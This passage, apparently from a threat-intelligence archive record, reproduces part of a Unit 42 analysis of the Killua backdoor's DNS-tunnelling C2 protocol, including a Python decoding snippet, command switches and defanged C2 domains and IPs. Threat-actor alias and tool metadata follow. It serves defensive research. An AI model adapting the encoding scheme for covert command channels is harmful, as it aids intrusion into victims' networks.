with the unique identifier \"EVcmmi\" and is then followed by base64\r\nencoded data as follows:\r\nEVcmmiYg==.learn-service[.]com\r\nEVcmmiYA==.learn-service[.]com\r\nEVcmmiYQ==.learn-service[.]com\r\nEVcmmiZw==.learn-service[.]com\r\nAt first, we believed that the subdomains containing the equals “=” characters would not resolve. 
However, we learned that\r\nDNS servers will respond to queries for domains that have labels containing non-standard characters. Before base64\r\nencoding the data, Killua encrypted the cleartext by XOR'ing each character with 83 (0x53), resulting in the following:\r\n\"Yg==\" is 1\r\n\"YA==\" is 3\r\n\"YQ==\" is 2\r\n\"Zw==\" is 4\r\nThe decrypted numbers above are the sequence numbers used to get the chunks of data requested by the C2 server. During\r\nour analysis, the C2 server responded to these queries with the following IPv4 addresses:\r\n69.67.1[.]81\r\n73.43.3[.]79\r\n55.80.2[.]68\r\n103.61.4[.]61\r\nAs you can see, the third octet contains the sequence number, while the other octets contain the data that Killua will put in\r\nthe correct sequence and treat as data. If we put the IP addresses in the correct sequence according to the third octet and treat\r\nthe other three octets as characters, we get the following:\r\n69.67.1[.]81 is \"ECQ\"\r\n55.80.2[.]68 is \"7PD\"\r\n73.43.3[.]79 is \"I+O\"\r\n103.61.4[.]61 is \"g==\"\r\nBy decoding the base64 string and decrypting it by XOR'ing each byte with 0x53, we can see the C2 server is issuing a\r\ncommand \"C\" followed by data \"whoami\":\r\n\u003e\u003e\u003e import base64\r\n\u003e\u003e\u003e out = \"\"\r\n\u003e\u003e\u003e for c in bytearray(base64.b64decode(\"ECQ7PDI+Og==\")):  # bytearray yields ints in both Python 2 and 3\r\n...     out += chr(c ^ 0x53)\r\n... \r\n\u003e\u003e\u003e out\r\n'Cwhoami'\r\nThe command \"C\" is the same character used by Hisoka when attempting to receive commands to execute on the system. If\r\nthe character immediately following the \"C\" is not a hyphen (\"-\"), then Killua will execute the data as a command by calling\r\nCreateProcessW using \"cmd /c\" with the data appended to this string. 
Otherwise, Killua will check for provided commands\r\nthat visually resemble the following command-line switches:\r\n-R\r\n-doer\r\n-S\r\n-status\r\n-change\r\n-id\r\n-resolver\r\n-help\r\nThe \"-help\" switch provides the following usage instructions, which give insight into the switches available and their\r\npurpose:\r\n+-+-+-+Killua-+-+-+-+\r\n-change [HOST.com]  ****** Change endPoint\r\n-doer ;[command] ****** Executer\r\n-status  ****** info\r\n-resolver [8.8.8.8]  ****** Resolver\r\n-R[num]s  ****** Response\r\n-P[num]  ****** packect\r\n-id [SIXLTR]  ****** ID\r\nTable View of the Link Analysis Chart\r\nDate Observed | Domain | IP Address | Campaign ID\r\n2/15/17 | ns1.cloudservername[.]com | 82.102.14[.]226 | DNS Hijacking\r\n6/1/17 | microsoft-publisher[.]com | 82.102.14[.]222 | ISM Agent\r\n11/29/17 | ns1.ressume[.]site | 82.102.14[.]222 | Oilrig\r\n12/29/17 | ns2.pasta58[.]com | 82.102.14[.]227 | Sakabota\r\n1/14/18 | dns.cloudipnameserver[.]com | 185.15.247[.]140 | DNS Hijacking\r\n9/9/18 | sakabota[.]com | 185.15.247[.]140 | Sakabota\r\n9/18/18 | ns1.firewallsupports[.]com | 213.202.217[.]4 | Sakabota\r\n11/18/18 | googie[.]email | 213.202.217[.]9 | Oilrig\r\n5/11/18 | whatzapps[.]net | 217.79.176[.]97 | Oilrig\r\n9/8/18 | ns1.windows-updates[.]com | 217.79.176[.]104 | Sakabota\r\n9/18/18 | ns1.6google[.]com | 217.79.176[.]104 | Sakabota\r\n2/19/19 | ns1.windows64x[.]com | 217.79.183[.]50 | Sakabota\r\n3/5/19 | ns1.microsofte-update[.]com | 217.79.183[.]53 | Hisoka\r\n3/20/19 | ns1.windows64x[.]com | 217.79.183[.]58 | Sakabota\r\n1/9/18 | www.opendns-server[.]com | 217.79.185[.]85 | Oilrig\r\n1/11/18 | ns1.windows-updates[.]com | 217.79.185[.]90 | Sakabota\r\n2/19/18 | dns.msnconnection[.]com | 217.79.185[.]65 | Oilrig\r\n10/13/18 | ns1.6google[.]com | 217.79.185[.]75 | Sakabota\r\n1/9/18 | outl00k[.]net | 74.91.19[.]118 | MuddyWater\r\n10/31/18 | ns1.pasta58[.]com | 74.91.19[.]113 | Sakabota\r\n11/9/18 | pasta58[.]com | 74.91.19[.]113 | Sakabota\r\n12/27/18 | www.microsofte-update[.]com | 74.91.19[.]119 | Hisoka\r\n4/7/19 | ns1.microsofte-update[.]com | 91.132.139[.]183 | Hisoka\r\n5/6/19 | ns1.alforatsystem[.]com | 91.132.139[.]254 | Sakabota\r\nTable 3. Infrastructure Analysis for Sakabota and Hisoka domains\r\nSource: https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/"
	],
	"report_names": [
		"xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20bc5b83-9ea0-4e60-a23e-19bf203dc9fb",
			"created_at": "2022-10-25T16:07:24.432777Z",
			"updated_at": "2026-04-10T02:00:04.986077Z",
			"deleted_at": null,
			"main_name": "xHunt",
			"aliases": [
				"Cobalt Katana",
				"Hive0081",
				"Hunter Serpens",
				"SectorD01"
			],
			"source_name": "ETDA:xHunt",
			"tools": [
				"CASHY200",
				"COLDTRAIN",
				"Gon",
				"Hisoka",
				"Killua",
				"Netero",
				"SHELLSTING",
				"Sakabota",
				"Snugy",
				"TriFive"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c5a103eb-08af-410b-b11d-3635f4d4a3eb",
			"created_at": "2025-08-07T02:03:24.756187Z",
			"updated_at": "2026-04-10T02:00:03.667108Z",
			"deleted_at": null,
			"main_name": "COBALT KATANA",
			"aliases": [
				"Hive0081 ",
				"SectorD01 ",
				"xHunt campaign "
			],
			"source_name": "Secureworks:COBALT KATANA",
			"tools": [
				"CASHY200",
				"Diezen",
				"Eye",
				"Gon",
				"Hisoka",
				"Hisoka Netero",
				"HyphenShell",
				"Killua",
				"Sakabota",
				"Sakabota Framework"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434177,
	"ts_updated_at": 1775792257,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8760851e40ff9b001aaa6128c13b4b1a7b5e52ba.pdf",
		"text": "https://archive.orkl.eu/8760851e40ff9b001aaa6128c13b4b1a7b5e52ba.txt",
		"img": "https://archive.orkl.eu/8760851e40ff9b001aaa6128c13b4b1a7b5e52ba.jpg"
	}
}